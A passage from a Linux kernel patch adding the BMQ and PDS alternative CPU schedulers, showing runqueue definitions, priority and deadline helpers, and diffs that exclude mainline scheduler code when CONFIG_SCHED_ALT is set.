++	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
++}
++
++/*
++ * wake flags
++ */
++#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
++#define WF_FORK		0x02		/* child wakeup after fork */
++#define WF_MIGRATED	0x04		/* internal use, task got migrated */
++
++#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
++
++struct sched_queue {
++	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
++	struct list_head heads[SCHED_BITS];
++};
++
++struct rq;
++struct balance_callback {
++	struct balance_callback *next;
++	void (*func)(struct rq *rq);
++};
++
++/*
++ * This is the main, per-CPU runqueue data structure.
++ * This data should only be modified by the local cpu.
++ */
++struct rq {
++	/* runqueue lock: */
++	raw_spinlock_t lock;
++
++	struct task_struct __rcu *curr;
++	struct task_struct *idle, *stop, *skip;
++	struct mm_struct *prev_mm;
++
++	struct sched_queue	queue;
++#ifdef CONFIG_SCHED_PDS
++	u64			time_edge;
++#endif
++	unsigned long prio;
++
++	/* switch count */
++	u64 nr_switches;
++
++	atomic_t nr_iowait;
++
++#ifdef CONFIG_SCHED_DEBUG
++	u64 last_seen_need_resched_ns;
++	int ticks_without_resched;
++#endif
++
++#ifdef CONFIG_MEMBARRIER
++	int membarrier_state;
++#endif
++
++#ifdef CONFIG_SMP
++	int cpu;		/* cpu of this runqueue */
++	bool online;
++
++	unsigned int		ttwu_pending;
++	unsigned char		nohz_idle_balance;
++	unsigned char		idle_balance;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	struct sched_avg	avg_irq;
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++	int active_balance;
++	struct cpu_stop_work	active_balance_work;
++#endif
++	struct balance_callback	*balance_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++	struct rcuwait		hotplug_wait;
++#endif
++	unsigned int		nr_pinned;
++
++#endif /* CONFIG_SMP */
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	u64 prev_irq_time;
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++#ifdef CONFIG_PARAVIRT
++	u64 prev_steal_time;
++#endif /* CONFIG_PARAVIRT */
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	u64 prev_steal_time_rq;
++#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
++
++	/* For genenal cpu load util */
++	s32 load_history;
++	u64 load_block;
++	u64 load_stamp;
++
++	/* calc_load related fields */
++	unsigned long calc_load_update;
++	long calc_load_active;
++
++	u64 clock, last_tick;
++	u64 last_ts_switch;
++	u64 clock_task;
++
++	unsigned int  nr_running;
++	unsigned long nr_uninterruptible;
++
++#ifdef CONFIG_SCHED_HRTICK
++#ifdef CONFIG_SMP
++	call_single_data_t hrtick_csd;
++#endif
++	struct hrtimer		hrtick_timer;
++	ktime_t			hrtick_time;
++#endif
++
++#ifdef CONFIG_SCHEDSTATS
++
++	/* latency stats */
++	struct sched_info rq_sched_info;
++	unsigned long long rq_cpu_time;
++	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
++
++	/* sys_sched_yield() stats */
++	unsigned int yld_count;
++
++	/* schedule() stats */
++	unsigned int sched_switch;
++	unsigned int sched_count;
++	unsigned int sched_goidle;
++
++	/* try_to_wake_up() stats */
++	unsigned int ttwu_count;
++	unsigned int ttwu_local;
++#endif /* CONFIG_SCHEDSTATS */
++
++#ifdef CONFIG_CPU_IDLE
++	/* Must be inspected within a rcu lock section */
++	struct cpuidle_state *idle_state;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++#ifdef CONFIG_SMP
++	call_single_data_t	nohz_csd;
++#endif
++	atomic_t		nohz_flags;
++#endif /* CONFIG_NO_HZ_COMMON */
++
++	/* Scratch cpumask to be temporarily used under rq_lock */
++	cpumask_var_t		scratch_mask;
++};
++
++extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
++
++extern unsigned long calc_load_update;
++extern atomic_long_t calc_load_tasks;
++
++extern void calc_global_load_tick(struct rq *this_rq);
++extern long calc_load_fold_active(struct rq *this_rq, long adjust);
++
++DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
++#define this_rq()		this_cpu_ptr(&runqueues)
++#define task_rq(p)		cpu_rq(task_cpu(p))
++#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
++#define raw_rq()		raw_cpu_ptr(&runqueues)
++
++#ifdef CONFIG_SMP
++#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
++void register_sched_domain_sysctl(void);
++void unregister_sched_domain_sysctl(void);
++#else
++static inline void register_sched_domain_sysctl(void)
++{
++}
++static inline void unregister_sched_domain_sysctl(void)
++{
++}
++#endif
++
++extern bool sched_smp_initialized;
++
++enum {
++	ITSELF_LEVEL_SPACE_HOLDER,
++#ifdef CONFIG_SCHED_SMT
++	SMT_LEVEL_SPACE_HOLDER,
++#endif
++	COREGROUP_LEVEL_SPACE_HOLDER,
++	CORE_LEVEL_SPACE_HOLDER,
++	OTHER_LEVEL_SPACE_HOLDER,
++	NR_CPU_AFFINITY_LEVELS
++};
++
++DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++
++static inline int
++__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
++{
++	int cpu;
++
++	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
++		mask++;
++
++	return cpu;
++}
++
++static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
++{
++	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
++}
++
++extern void flush_smp_call_function_queue(void);
++
++#else  /* !CONFIG_SMP */
++static inline void flush_smp_call_function_queue(void) { }
++#endif
++
++#ifndef arch_scale_freq_tick
++static __always_inline
++void arch_scale_freq_tick(void)
++{
++}
++#endif
++
++#ifndef arch_scale_freq_capacity
++static __always_inline
++unsigned long arch_scale_freq_capacity(int cpu)
++{
++	return SCHED_CAPACITY_SCALE;
++}
++#endif
++
++static inline u64 __rq_clock_broken(struct rq *rq)
++{
++	return READ_ONCE(rq->clock);
++}
++
++static inline u64 rq_clock(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ, call to
++	 * sched_info_xxxx() may not held rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock;
++}
++
++static inline u64 rq_clock_task(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ, call to
++	 * sched_info_xxxx() may not held rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock_task;
++}
++
++/*
++ * {de,en}queue flags:
++ *
++ * DEQUEUE_SLEEP  - task is no longer runnable
++ * ENQUEUE_WAKEUP - task just became runnable
++ *
++ */
++
++#define DEQUEUE_SLEEP		0x01
++
++#define ENQUEUE_WAKEUP		0x01
++
++
++/*
++ * Below are scheduler API which using in other kernel code
++ * It use the dummy rq_flags
++ * ToDo : BMQ need to support these APIs for compatibility with mainline
++ * scheduler code.
++ */
++struct rq_flags {
++	unsigned long flags;
++};
++
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock);
++
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock);
++
++static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++}
++
++static inline void
++rq_lock(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock(&rq->lock);
++}
++
++static inline void
++rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++static inline struct rq *
++this_rq_lock_irq(struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	local_irq_disable();
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	return rq;
++}
++
++static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
++{
++	return &rq->lock;
++}
++
++static inline raw_spinlock_t *rq_lockp(struct rq *rq)
++{
++	return __rq_lockp(rq);
++}
++
++static inline void lockdep_assert_rq_held(struct rq *rq)
++{
++	lockdep_assert_held(__rq_lockp(rq));
++}
++
++extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
++extern void raw_spin_rq_unlock(struct rq *rq);
++
++static inline void raw_spin_rq_lock(struct rq *rq)
++{
++	raw_spin_rq_lock_nested(rq, 0);
++}
++
++static inline void raw_spin_rq_lock_irq(struct rq *rq)
++{
++	local_irq_disable();
++	raw_spin_rq_lock(rq);
++}
++
++static inline void raw_spin_rq_unlock_irq(struct rq *rq)
++{
++	raw_spin_rq_unlock(rq);
++	local_irq_enable();
++}
++
++static inline int task_current(struct rq *rq, struct task_struct *p)
++{
++	return rq->curr == p;
++}
++
++static inline bool task_on_cpu(struct task_struct *p)
++{
++	return p->on_cpu;
++}
++
++extern int task_running_nice(struct task_struct *p);
++
++extern struct static_key_false sched_schedstats;
++
++#ifdef CONFIG_CPU_IDLE
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++	rq->idle_state = idle_state;
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	WARN_ON(!rcu_read_lock_held());
++	return rq->idle_state;
++}
++#else
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	return NULL;
++}
++#endif
++
++static inline int cpu_of(const struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	return rq->cpu;
++#else
++	return 0;
++#endif
++}
++
++#include "stats.h"
++
++#ifdef CONFIG_NO_HZ_COMMON
++#define NOHZ_BALANCE_KICK_BIT	0
++#define NOHZ_STATS_KICK_BIT	1
++
++#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
++#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
++
++#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
++
++#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
++
++/* TODO: needed?
++extern void nohz_balance_exit_idle(struct rq *rq);
++#else
++static inline void nohz_balance_exit_idle(struct rq *rq) { }
++*/
++#endif
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++struct irqtime {
++	u64			total;
++	u64			tick_delta;
++	u64			irq_start_time;
++	struct u64_stats_sync	sync;
++};
++
++DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
++
++/*
++ * Returns the irqtime minus the softirq time computed by ksoftirqd.
++ * Otherwise ksoftirqd's sum_exec_runtime is substracted its own runtime
++ * and never move forward.
++ */
++static inline u64 irq_time_read(int cpu)
++{
++	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
++	unsigned int seq;
++	u64 total;
++
++	do {
++		seq = __u64_stats_fetch_begin(&irqtime->sync);
++		total = irqtime->total;
++	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
++
++	return total;
++}
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++
++#ifdef CONFIG_CPU_FREQ
++DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++extern int __init sched_tick_offload_init(void);
++#else
++static inline int sched_tick_offload_init(void) { return 0; }
++#endif
++
++#ifdef arch_scale_freq_capacity
++#ifndef arch_scale_freq_invariant
++#define arch_scale_freq_invariant()	(true)
++#endif
++#else /* arch_scale_freq_capacity */
++#define arch_scale_freq_invariant()	(false)
++#endif
++
++extern void schedule_idle(void);
++
++#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
++
++/*
++ * !! For sched_setattr_nocheck() (kernel) only !!
++ *
++ * This is actually gross. :(
++ *
++ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
++ * tasks, but still be able to sleep. We need this on platforms that cannot
++ * atomically change clock frequency. Remove once fast switching will be
++ * available on such platforms.
++ *
++ * SUGOV stands for SchedUtil GOVernor.
++ */
++#define SCHED_FLAG_SUGOV	0x10000000
++
++#ifdef CONFIG_MEMBARRIER
++/*
++ * The scheduler provides memory barriers required by membarrier between:
++ * - prior user-space memory accesses and store to rq->membarrier_state,
++ * - store to rq->membarrier_state and following user-space memory accesses.
++ * In the same way it provides those guarantees around store to rq->curr.
++ */
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++	int membarrier_state;
++
++	if (prev_mm == next_mm)
++		return;
++
++	membarrier_state = atomic_read(&next_mm->membarrier_state);
++	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
++		return;
++
++	WRITE_ONCE(rq->membarrier_state, membarrier_state);
++}
++#else
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++}
++#endif
++
++#ifdef CONFIG_NUMA
++extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
++#else
++static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return nr_cpu_ids;
++}
++#endif
++
++extern void swake_up_all_locked(struct swait_queue_head *q);
++extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++extern int preempt_dynamic_mode;
++extern int sched_dynamic_mode(const char *str);
++extern void sched_dynamic_update(int mode);
++#endif
++
++static inline void nohz_run_idle_balance(int cpu) { }
++
++static inline
++unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
++				  struct task_struct *p)
++{
++	return util;
++}
++
++static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
++
++#endif /* ALT_SCHED_H */
+diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
+new file mode 100644
+index 000000000000..66b77291b9d0
+--- /dev/null
++++ b/kernel/sched/bmq.h
+@@ -0,0 +1,110 @@
++#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++/*
++ * BMQ only routines
++ */
++#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
++#define boost_threshold(p)	(sched_timeslice_ns >>\
++				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
++
++static inline void boost_task(struct task_struct *p)
++{
++	int limit;
++
++	switch (p->policy) {
++	case SCHED_NORMAL:
++		limit = -MAX_PRIORITY_ADJ;
++		break;
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		limit = 0;
++		break;
++	default:
++		return;
++	}
++
++	if (p->boost_prio > limit)
++		p->boost_prio--;
++}
++
++static inline void deboost_task(struct task_struct *p)
++{
++	if (p->boost_prio < MAX_PRIORITY_ADJ)
++		p->boost_prio++;
++}
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms) {}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	return p->prio + p->boost_prio - MAX_RT_PRIO;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO)? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return task_sched_prio(p);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return prio;
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return idx;
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
++		if (SCHED_RR != p->policy)
++			deboost_task(p);
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++	}
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
++
++inline int task_running_nice(struct task_struct *p)
++{
++	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p)
++{
++	if(this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
++		boost_task(p);
++}
++#endif
++
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
++{
++	if (rq_switch_time(rq) < boost_threshold(p))
++		boost_task(p);
++}
++
++static inline void update_rq_time_edge(struct rq *rq) {}
+diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
+index d9dc9ab3773f..71a25540d65e 100644
+--- a/kernel/sched/build_policy.c
++++ b/kernel/sched/build_policy.c
+@@ -42,13 +42,19 @@
+ 
+ #include "idle.c"
+ 
++#ifndef CONFIG_SCHED_ALT
+ #include "rt.c"
++#endif
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ # include "cpudeadline.c"
++#endif
+ # include "pelt.c"
+ #endif
+ 
+ #include "cputime.c"
+-#include "deadline.c"
+ 
++#ifndef CONFIG_SCHED_ALT
++#include "deadline.c"
++#endif
+diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
+index 99bdd96f454f..23f80a86d2d7 100644
+--- a/kernel/sched/build_utility.c
++++ b/kernel/sched/build_utility.c
+@@ -85,7 +85,9 @@
+ 
+ #ifdef CONFIG_SMP
+ # include "cpupri.c"
++#ifndef CONFIG_SCHED_ALT
+ # include "stop_task.c"
++#endif
+ # include "topology.c"
+ #endif
+ 
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c1..68812e0756cb 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
+ 	struct rq *rq = cpu_rq(sg_cpu->cpu);
+ 
+ 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
++#ifndef CONFIG_SCHED_ALT
+ 	sg_cpu->bw_dl = cpu_bw_dl(rq);
+ 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
+ 					  FREQUENCY_UTIL, NULL);
++#else
++	sg_cpu->bw_dl = 0;
++	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
++#endif /* CONFIG_SCHED_ALT */
+ }
+ 
+ /**
+@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
+  */
+ static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
+ 		sg_cpu->sg_policy->limits_changed = true;
++#endif
+ }
+ 
+ static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
+@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
+ 	}
+ 
+ 	ret = sched_setattr_nocheck(thread, &attr);
++
+ 	if (ret) {
+ 		kthread_stop(thread);
+ 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
+@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
+ #ifdef CONFIG_ENERGY_MODEL
+ static void rebuild_sd_workfn(struct work_struct *work)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	rebuild_sched_domains_energy();
++#endif /* CONFIG_SCHED_ALT */
+ }
+ static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
+ 
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc77853743..b48b3f9ed47f 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
+ 	p->utime += cputime;
+ 	account_group_user_time(p, cputime);
+ 
+-	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
++	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
+ 
+ 	/* Add user time to cpustat. */
+ 	task_group_account_field(p, index, cputime);
+@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
+ 	p->gtime += cputime;
+ 
+ 	/* Add guest time to cpustat. */
+-	if (task_nice(p) > 0) {
++	if (task_running_nice(p)) {
+ 		task_group_account_field(p, CPUTIME_NICE, cputime);
+ 		cpustat[CPUTIME_GUEST_NICE] += cputime;
+ 	} else {
+@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
+ #ifdef CONFIG_64BIT
+ static inline u64 read_sum_exec_runtime(struct task_struct *t)
+ {
+-	return t->se.sum_exec_runtime;
++	return tsk_seruntime(t);
+ }
+ #else
+ static u64 read_sum_exec_runtime(struct task_struct *t)
+@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
+ 	struct rq *rq;
+ 
+ 	rq = task_rq_lock(t, &rf);
+-	ns = t->se.sum_exec_runtime;
++	ns = tsk_seruntime(t);
+ 	task_rq_unlock(rq, t, &rf);
+ 
+ 	return ns;
+@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
+ {
+ 	struct task_cputime cputime = {
+-		.sum_exec_runtime = p->se.sum_exec_runtime,
++		.sum_exec_runtime = tsk_seruntime(p),
+ 	};
+ 
+ 	if (task_cputime(p, &cputime.utime, &cputime.stime))
+diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
+index 1637b65ba07a..033c6deeb515 100644
+--- a/kernel/sched/debug.c
++++ b/kernel/sched/debug.c
+@@ -7,6 +7,7 @@
+  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * This allows printing both to /proc/sched_debug and
+  * to the console
+@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
+ };
+ 
+ #endif /* SMP */
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 
+@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
+ 
+ #endif /* CONFIG_PREEMPT_DYNAMIC */
+ 
++#ifndef CONFIG_SCHED_ALT
+ __read_mostly bool sched_debug_verbose;
+ 
+ static const struct seq_operations sched_debug_sops;
+@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
+ 	.llseek		= seq_lseek,
+ 	.release	= seq_release,
+ };
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ static struct dentry *debugfs_sched;
+ 
+@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
+ 
+ 	debugfs_sched = debugfs_create_dir("sched", NULL);
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
+ 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
++#endif /* !CONFIG_SCHED_ALT */
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
+ #endif
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
+ 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
+ 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
+@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
+ #endif
+ 
+ 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ 	return 0;
+ }
+ late_initcall(sched_init_debug);
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_SMP
+ 
+ static cpumask_var_t		sd_sysctl_cpus;
+@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
+ 	memset(&p->stats, 0, sizeof(p->stats));
+ #endif
+ }
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ void resched_latency_warn(int cpu, u64 latency)
+ {
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d..480d4ad16d45 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
+ 		do_idle();
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * idle-task scheduling class.
+  */
+@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
+ 	.switched_to		= switched_to_idle,
+ 	.update_curr		= update_curr_idle,
+ };
++#endif
+diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
+new file mode 100644
+index 000000000000..56a649d02e49
+--- /dev/null
++++ b/kernel/sched/pds.h
+@@ -0,0 +1,127 @@
++#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++static int sched_timeslice_shift = 22;
++
++#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms)
++{
++	if (2 == timeslice_ms)
++		sched_timeslice_shift = 21;
++}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
++
++	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
++		      "pds: task_sched_prio_normal() delta %lld\n", delta))
++		return NORMAL_PRIO_NUM - 1;
++
++	return (delta < 0) ? 0 : delta;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio :
++		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
++		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
++						  rq->time_edge);
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
++				NORMAL_PRIO_MOD(rq->time_edge));
++}
++
++static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
++{
++	if (p->prio >= MAX_RT_PRIO)
++		p->deadline = (rq->clock >> sched_timeslice_shift) +
++			p->static_prio - (MAX_PRIO - NICE_WIDTH);
++}
++
++int task_running_nice(struct task_struct *p)
++{
++	return (p->prio > DEFAULT_PRIO);
++}
++
++static inline void update_rq_time_edge(struct rq *rq)
++{
++	struct list_head head;
++	u64 old = rq->time_edge;
++	u64 now = rq->clock >> sched_timeslice_shift;
++	u64 prio, delta;
++
++	if (now == old)
++		return;
++
++	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
++	INIT_LIST_HEAD(&head);
++
++	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
++		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
++				      NORMAL_PRIO_MOD(prio + old), &head);
++
++	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
++		rq->queue.bitmap[2] >> delta;
++	rq->time_edge = now;
++	if (!list_empty(&head)) {
++		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
++		struct task_struct *p;
++
++		list_for_each_entry(p, &head, sq_node)
++			p->sq_idx = idx;
++
++		list_splice(&head, rq->queue.heads + idx);
++		rq->queue.bitmap[2] |= 1UL;
++	}
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++	sched_renew_deadline(p, rq);
